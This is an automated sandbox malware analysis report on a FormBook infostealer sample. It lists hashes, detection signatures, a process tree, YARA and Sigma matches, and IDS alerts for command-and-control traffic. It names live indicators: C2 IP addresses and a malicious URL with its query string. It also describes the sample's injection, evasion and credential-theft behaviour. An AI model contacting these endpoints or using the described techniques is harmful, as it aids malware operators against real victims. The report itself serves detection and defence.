Edit tour

Windows Analysis Report
bkTW1FbgHN.exe

Overview

General Information

Sample name:	bkTW1FbgHN.exe renamed because original name is a hash value
Original sample name:	154ac63a4aa96b43d3622549ff591e9c4b7ee1942c48d31c32e843d66dc781a1.exe
Analysis ID:	1587957
MD5:	03058e6963643582d3b8bfce25d7320f
SHA1:	a412200951397af08cec97115f957fee91baf1b2
SHA256:	154ac63a4aa96b43d3622549ff591e9c4b7ee1942c48d31c32e843d66dc781a1
Tags:	exeFormbookuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Suspicious Process Parents

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

bkTW1FbgHN.exe (PID: 5828 cmdline: "C:\Users\user\Desktop\bkTW1FbgHN.exe" MD5: 03058E6963643582D3B8BFCE25D7320F)

svchost.exe (PID: 752 cmdline: "C:\Users\user\Desktop\bkTW1FbgHN.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

uDeZXYtzetmc.exe (PID: 6256 cmdline: "C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

calc.exe (PID: 6700 cmdline: "C:\Windows\SysWOW64\calc.exe" MD5: 961E093BE1F666FD38602AD90A5F480F)

uDeZXYtzetmc.exe (PID: 5868 cmdline: "C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 4780 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.3339789975.0000000004A10000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3337814220.0000000004C90000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3337904814.0000000004D00000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3335955747.0000000003020000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1887341354.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1887721953.0000000003990000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1888111651.0000000003D50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3337603286.0000000002520000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Process Parents

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe" , CommandLine: "C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe, NewProcessName: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe, OriginalFileName: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe, ParentCommandLine: "C:\Windows\SysWOW64\calc.exe", ParentImage: C:\Windows\SysWOW64\calc.exe, ParentProcessId: 6700, ParentProcessName: calc.exe, ProcessCommandLine: "C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe" , ProcessId: 5868, ProcessName: uDeZXYtzetmc.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\bkTW1FbgHN.exe", CommandLine: "C:\Users\user\Desktop\bkTW1FbgHN.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\bkTW1FbgHN.exe", ParentImage: C:\Users\user\Desktop\bkTW1FbgHN.exe, ParentProcessId: 5828, ParentProcessName: bkTW1FbgHN.exe, ProcessCommandLine: "C:\Users\user\Desktop\bkTW1FbgHN.exe", ProcessId: 752, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\bkTW1FbgHN.exe", CommandLine: "C:\Users\user\Desktop\bkTW1FbgHN.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\bkTW1FbgHN.exe", ParentImage: C:\Users\user\Desktop\bkTW1FbgHN.exe, ParentProcessId: 5828, ParentProcessName: bkTW1FbgHN.exe, ProcessCommandLine: "C:\Users\user\Desktop\bkTW1FbgHN.exe", ProcessId: 752, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T19:56:03.569533+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	49711	199.59.243.228	80	TCP
2025-01-10T19:56:27.728275+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	49747	18.139.62.226	80	TCP
2025-01-10T19:56:41.276506+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	49839	199.59.243.228	80	TCP
2025-01-10T19:56:54.818589+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	49923	146.88.233.115	80	TCP
2025-01-10T19:57:08.580825+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	49995	85.159.66.93	80	TCP
2025-01-10T19:57:22.797035+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	49999	104.21.7.187	80	TCP
2025-01-10T19:57:45.033632+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	50003	13.248.169.48	80	TCP
2025-01-10T19:57:58.813636+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	50007	162.0.213.94	80	TCP
2025-01-10T19:58:12.200671+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	50011	3.33.130.190	80	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T19:56:03.569533+0100	2855465	1	A Network Trojan was detected	192.168.2.8	49711	199.59.243.228	80	TCP
2025-01-10T19:56:27.728275+0100	2855465	1	A Network Trojan was detected	192.168.2.8	49747	18.139.62.226	80	TCP
2025-01-10T19:56:41.276506+0100	2855465	1	A Network Trojan was detected	192.168.2.8	49839	199.59.243.228	80	TCP
2025-01-10T19:56:54.818589+0100	2855465	1	A Network Trojan was detected	192.168.2.8	49923	146.88.233.115	80	TCP
2025-01-10T19:57:08.580825+0100	2855465	1	A Network Trojan was detected	192.168.2.8	49995	85.159.66.93	80	TCP
2025-01-10T19:57:22.797035+0100	2855465	1	A Network Trojan was detected	192.168.2.8	49999	104.21.7.187	80	TCP
2025-01-10T19:57:45.033632+0100	2855465	1	A Network Trojan was detected	192.168.2.8	50003	13.248.169.48	80	TCP
2025-01-10T19:57:58.813636+0100	2855465	1	A Network Trojan was detected	192.168.2.8	50007	162.0.213.94	80	TCP
2025-01-10T19:58:12.200671+0100	2855465	1	A Network Trojan was detected	192.168.2.8	50011	3.33.130.190	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T19:56:20.061725+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49712	18.139.62.226	80	TCP
2025-01-10T19:56:22.609544+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49714	18.139.62.226	80	TCP
2025-01-10T19:56:25.171695+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49730	18.139.62.226	80	TCP
2025-01-10T19:56:33.609278+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49791	199.59.243.228	80	TCP
2025-01-10T19:56:36.194568+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49805	199.59.243.228	80	TCP
2025-01-10T19:56:38.721908+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49824	199.59.243.228	80	TCP
2025-01-10T19:56:47.422765+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49874	146.88.233.115	80	TCP
2025-01-10T19:56:49.756272+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49889	146.88.233.115	80	TCP
2025-01-10T19:56:52.298153+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49905	146.88.233.115	80	TCP
2025-01-10T19:57:01.725338+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49960	85.159.66.93	80	TCP
2025-01-10T19:57:04.287916+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49976	85.159.66.93	80	TCP
2025-01-10T19:57:06.834861+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49992	85.159.66.93	80	TCP
2025-01-10T19:57:15.096105+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49996	104.21.7.187	80	TCP
2025-01-10T19:57:17.679275+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49997	104.21.7.187	80	TCP
2025-01-10T19:57:20.214853+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49998	104.21.7.187	80	TCP
2025-01-10T19:57:28.298910+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50000	13.248.169.48	80	TCP
2025-01-10T19:57:30.842191+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50001	13.248.169.48	80	TCP
2025-01-10T19:57:33.545530+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50002	13.248.169.48	80	TCP
2025-01-10T19:57:50.908441+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50004	162.0.213.94	80	TCP
2025-01-10T19:57:53.560247+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50005	162.0.213.94	80	TCP
2025-01-10T19:57:55.982741+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50006	162.0.213.94	80	TCP
2025-01-10T19:58:04.416939+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50008	3.33.130.190	80	TCP
2025-01-10T19:58:06.985490+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50009	3.33.130.190	80	TCP
2025-01-10T19:58:09.541594+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50010	3.33.130.190	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.gk88top.top/9nv0/?QzmLxn8=dWg3C6isp4+VD88a1DBFx9aObA+xTghSwfxMZ+zxeeN7T5xq2T9IGxIaUDChQ5FgGLs4ea44SkIDXQDkT+XV66wbCmoESxYHmimpEhjR9x/TqaeLMadTIOG0BL9hL7PHyQ==&nbd8Y=hfD0	Avira URL Cloud: Label: malware
Source: http://www.gk88top.top/9nv0/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: bkTW1FbgHN.exe	Virustotal: Detection: 58%			Perma Link
Source: bkTW1FbgHN.exe	ReversingLabs: Detection: 65%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3339789975.0000000004A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3337814220.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3337904814.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3335955747.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1887341354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1887721953.0000000003990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1888111651.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3337603286.0000000002520000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: bkTW1FbgHN.exe

Joe Sandbox ML: detected

Source: bkTW1FbgHN.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: calc.pdbGCTL source: svchost.exe, 00000002.00000003.1855097265.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1855699365.000000000342B000.00000004.00000020.00020000.00000000.sdmp, uDeZXYtzetmc.exe, 00000004.00000002.3336433615.0000000000730000.00000004.00000020.00020000.00000000.sdmp, uDeZXYtzetmc.exe, 00000004.00000002.3336433615.0000000000718000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uDeZXYtzetmc.exe, 00000004.00000002.3336948822.00000000008DE000.00000002.00000001.01000000.00000005.sdmp, uDeZXYtzetmc.exe, 00000008.00000000.1966710715.00000000008DE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: bkTW1FbgHN.exe, 00000000.00000003.1482829369.00000000043E0000.00000004.00001000.00020000.00000000.sdmp, bkTW1FbgHN.exe, 00000000.00000003.1483532312.0000000004240000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789676355.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1887756736.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1887756736.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1787802643.0000000003600000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 00000005.00000002.3338202134.0000000005060000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 00000005.00000003.1892770553.0000000004D00000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 00000005.00000002.3338202134.00000000051FE000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 00000005.00000003.1895123628.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: calc.pdb source: svchost.exe, 00000002.00000003.1855097265.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1855699365.000000000342B000.00000004.00000020.00020000.00000000.sdmp, uDeZXYtzetmc.exe, 00000004.00000002.3336433615.0000000000730000.00000004.00000020.00020000.00000000.sdmp, uDeZXYtzetmc.exe, 00000004.00000002.3336433615.0000000000718000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: bkTW1FbgHN.exe, 00000000.00000003.1482829369.00000000043E0000.00000004.00001000.00020000.00000000.sdmp, bkTW1FbgHN.exe, 00000000.00000003.1483532312.0000000004240000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1789676355.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1887756736.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1887756736.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1787802643.0000000003600000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 00000005.00000002.3338202134.0000000005060000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 00000005.00000003.1892770553.0000000004D00000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 00000005.00000002.3338202134.00000000051FE000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 00000005.00000003.1895123628.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: calc.exe, 00000005.00000002.3338976521.000000000568C000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 00000005.00000002.3336312350.0000000003305000.00000004.00000020.00020000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000000.1966978807.00000000025DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2195895650.00000000373AC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: calc.exe, 00000005.00000002.3338976521.000000000568C000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 00000005.00000002.3336312350.0000000003305000.00000004.00000020.00020000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000000.1966978807.00000000025DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2195895650.00000000373AC000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FF445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00FF445A
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FFC6D1 FindFirstFileW,FindClose,	0_2_00FFC6D1
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FFC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00FFC75C
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FFEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00FFEF95
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FFF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00FFF0F2
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FFF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00FFF3F3
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FF37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00FF37EF
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FF3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00FF3B12
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FFBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00FFBCBC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49730 -> 18.139.62.226:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49711 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49714 -> 18.139.62.226:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49711 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49712 -> 18.139.62.226:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49747 -> 18.139.62.226:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49747 -> 18.139.62.226:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49805 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49824 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49839 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49839 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49791 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49874 -> 146.88.233.115:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49905 -> 146.88.233.115:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49889 -> 146.88.233.115:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49923 -> 146.88.233.115:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49923 -> 146.88.233.115:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49997 -> 104.21.7.187:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49996 -> 104.21.7.187:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49992 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:50003 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50003 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50004 -> 162.0.213.94:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50006 -> 162.0.213.94:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49995 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49995 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49960 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50002 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50005 -> 162.0.213.94:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50000 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49976 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50001 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:50007 -> 162.0.213.94:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50007 -> 162.0.213.94:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50009 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50010 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:50011 -> 3.33.130.190:80
